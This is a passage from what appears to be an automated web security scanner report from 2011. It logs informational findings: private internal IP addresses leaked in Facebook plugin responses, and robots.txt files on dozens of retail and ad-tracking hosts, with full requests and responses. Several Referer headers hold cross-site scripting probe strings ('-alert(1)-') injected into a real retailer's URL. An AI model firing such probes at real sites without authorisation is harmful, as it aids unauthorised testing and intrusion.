21.83. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.168.122

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.84. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.21.111

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.85. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.167.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.86. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.216.35

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.87. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.170.128

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.88. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.10.49

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.89. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.49

Request

Response

22. Robots.txt file previous next
There are 117 instances of this issue:

http://4qinvite.4q.iperceptions.com/1.aspx
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791
http://a.netmng.com/
http://a.rfihub.com/ca.gif
http://a.tribalfusion.com/i.cid
http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg
http://action.media6degrees.com/orbserv/hbjs
http://ad.afy11.net/ad
http://ad.doubleclick.net/activity
http://ads.traderonline.com/RealMedia/ads/adstream.cap/123
http://ads.undertone.com/f
http://altfarm.mediaplex.com/ad/bk/17038-128025-3840-0
http://american.redcross.org/site/PageServer
http://b.scorecardresearch.com/p
http://beacon.afy11.net/ad
http://bluefly-www.baynote.net/baynote/tags2/policy
http://bluefly.com/
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://buy.travelguard.com/TGI2/proc/stateselector.aspx
http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859
http://cimg-1.restorationhardware.com/cm
http://cm.g.doubleclick.net/pixel
http://community.petco.com/n/pfx/forum.aspx
http://customerappreciation.petco.com/cm
http://d.xp1.ru4.com/activity
http://data.coremetrics.com/cm
http://dis.us.criteo.com/dis/dis.aspx
http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx
http://feeds.bbci.co.uk/news/rss.xml
http://fls.doubleclick.net/activityi
http://gnc.imageg.net/min-cat/site-css.xml.min.css
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052618686/
http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s01026654783636
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://images.scanalert.com/meter/www.mcafee.com/55.gif
http://login.dotomi.com/ucm/UCMController
http://marketlive.122.2o7.net/b/ss/mlhelzbprod/1/H.20.3/s05609032628126
http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard
http://media.gnc.com/ipixel
http://media.gsimedia.net/ipixel
http://media2.legacy.com/bind
http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734
http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151
http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s06308770310133
http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s0464884343091
http://metrics.pacsun.com/b/ss/pacsuncom/1/H.21/s03375264031346
http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s02726066182367
http://mlarmani.122.2o7.net/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601
https://ordering.ftd.com/signin/
http://pet.imageg.net/favicon.ico
http://pixel.mathtag.com/event/img
http://r.turn.com/r/beacon
http://rpt.footlocker.com/eluminate
http://rs.instantservice.com/resources/smartbutton/7664/44640/available.gif
http://s.petco.com/js_raw/mtagconfig.js
http://s.xp1.ru4.com/meta
https://secure.bhphotovideo.com/bnh/controller/home
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
http://segment-pixel.invitemedia.com/pixel
http://server.bhphotovideo.com/cm
http://shop.pacsun.com/home.jsp
http://srv.clickfuse.com/pixels/create.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css
http://subscriptions.marvel.com/
https://subscriptions.marvel.com/checkout/
http://sv.liveclicker.net/service/api
http://sync.mathtag.com/sync/img
http://t.p.mybuys.com/webrec/wr.do
http://tag.admeld.com/pixel
http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx
http://tracking.searchmarketing.com/welcome.asp
http://trvlgrd.netmng.com/
http://uat.netmng.com/pixel/
http://wasc.homedepot.ca/b/ss/homedepotca/1/H.22.1/s06511195921339
http://web.aisle7.net/api/1.0/widgets/general/newswire-widget
http://www.acehardware.com/home/index.jsp
https://www.acehardware.com/coreg/index.jsp
http://www.armaniexchange.com/category/womens.do
https://www.armaniexchange.com/account/login.do
http://www.bhphotovideo.com/bnh/controller/home
http://www.bluefly.com/__ssobj/ard.png
http://www.bluenile.com/
https://www.brookstone.com/imageservlet
http://www.facebook.com/plugins/like.php
http://www.footlocker.com/
https://www.footlocker.com/account/default.cfm
http://www.ftd.com/
http://www.gnc.com/home/index.jsp
https://www.gnc.com/coreg/index.jsp
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1052618686/
http://www.guitarcenter.com/
https://www.guitarcenter.com/MyAccount/Default.aspx
http://www.helzberg.com/
https://www.helzberg.com/account/login.do
http://www.homedepot.ca/webapp/wcs/stores/servlet/Home
http://www.imiclk.com/cgi/r.cgi
http://www.linkedin.com/companyInsider
http://www.orderhouse.com/
https://www.orderhouse.com/default.aspx
http://www.orientaltrading.com/
http://www.petco.com/
http://www.petsmart.com/
https://www.petsmart.com/coreg/index.jsp
http://www.redcrossstore.org/
https://www.redcrossstore.org/Shopper/ContactInfo.aspx
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.restorationhardware.com/
https://www.restorationhardware.com/my-account/sign-in.jsp
http://www.siteadvisor.com/download/windows.html
http://www.toshibadirect.com/td/b2c/laptops.to
https://www.toshibadirect.com/td/b2c/myaccount.to
http://www.travelguard.com/
http://www26.orientaltrading.com/cm

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://4qinvite.4q.iperceptions.com/1.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://4qinvite.4q.iperceptions.com
Path:	/1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
Date: Mon, 16 May 2011 02:08:07 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.2. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.monetate.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 01:53:12 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Thu, 12 Aug 2010 15:52:45 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

22.3. http://a.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.4. http://a.rfihub.com/ca.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/ca.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 26

User-agent: *
Disallow: /

22.5. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

22.6. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ace.imageg.net
Path:	/graphics/product_images/pACE3-4403835th.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 461
Connection: close

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.7. http://action.media6degrees.com/orbserv/hbjs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 16 May 2011 01:55:03 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.8. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

22.9. http://ad.doubleclick.net/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.10. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6ad8-1a-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

22.11. http://ads.undertone.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/f

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "55001c-1a-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

User-agent: *
Disallow: /

22.12. http://altfarm.mediaplex.com/ad/bk/17038-128025-3840-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/bk/17038-128025-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

User-agent: *
Disallow: /

22.13. http://american.redcross.org/site/PageServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://american.redcross.org
Path:	/site/PageServer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: american.redcross.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:05 GMT
Server: Apache
Last-Modified: Thu, 13 Sep 2001 00:25:08 GMT
ETag: "1af36c0-b4-3b9ffce4"
Accept-Ranges: bytes
Content-Length: 180
Keep-Alive: timeout=8, max=500
Connection: Keep-Alive
Content-Type: text/plain

# $Header: /home/cvs/cvsroot/site_data/001/00000001/static_data/robots.txt,v 1.4 2001/09/13 00:25:08 dave Exp $
User-agent: *
Disallow: /site/Calendar
Disallow: /site/TellAFriend

22.14. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.15. http://beacon.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://beacon.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:35 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

22.16. http://bluefly-www.baynote.net/baynote/tags2/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bluefly-www.baynote.net
Path:	/baynote/tags2/policy

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bluefly-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1305510604000"
Last-Modified: Mon, 16 May 2011 01:50:04 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 16 May 2011 02:02:52 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

22.17. http://bluefly.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bluefly.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bluefly.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:13 GMT
Vary: Host,Accept-Encoding
Last-Modified: Thu, 28 Apr 2011 14:44:20 GMT
ETag: "b825-3bd-4a1fb97a6d900"
Accept-Ranges: bytes
Content-Length: 957
Content-Type: text/plain
Set-Cookie: TLTHID=604A78DE7F60107F23DE80EF47F03CD2; Path=/
Set-Cookie: TLTSID=604A78DE7F60107F23DE80EF47F03CD2; Path=/
RTSS: 1
Keep-Alive: timeout=5, max=250
Connection: close
Set-Cookie: TS18d374=e3776ce2d9704d0b456b3305825445dc583d9b50696a1f874dd08568; Path=/

User-agent: *
Allow: /
Disallow: /myfly/
Disallow: /myaccount/
Disallow: /cart/
Disallow: /browse/quickLogin.jsp
Disallow: /browse/pdpQuickAdd.jsp
Disallow: /browse/f_quick_buy.jsp
Disallow: /
...[SNIP]...

22.18. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.19. http://buy.travelguard.com/TGI2/proc/stateselector.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/TGI2/proc/stateselector.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy.travelguard.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 23 Apr 2008 22:26:26 GMT
Accept-Ranges: bytes
ETag: "0d5591191a5c81:1ea23"
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:21 GMT
Connection: close

User-agent: *
Disallow: /

22.20. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cebwa.122.2o7.net
Path:	/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "359150-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www270
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.21. http://cimg-1.restorationhardware.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cimg-1.restorationhardware.com
Path:	/cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "3d152a-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=976
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.22. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 01:54:55 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.23. http://community.petco.com/n/pfx/forum.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/n/pfx/forum.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.petco.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 02:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Served: DC2WEB030 5/15/2011 10:01:13 PM, 0 wait
Cache-Control: public, max-age=900
Expires: Mon, 16 May 2011 02:16:13 GMT
Last-Modified: Tue, 10 May 2011 18:05:43 GMT
Content-Type: text/plain
Content-Length: 106

User-Agent: *
Sitemap: http://community.petco.com/n/SiteMap.aspx?webtag=fd03pz&sitemapid=0
Disallow:

22.24. http://customerappreciation.petco.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://customerappreciation.petco.com
Path:	/cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:25 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "17573c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=974
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.25. http://d.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

22.26. http://data.coremetrics.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.coremetrics.com
Path:	/cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "1fc85c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
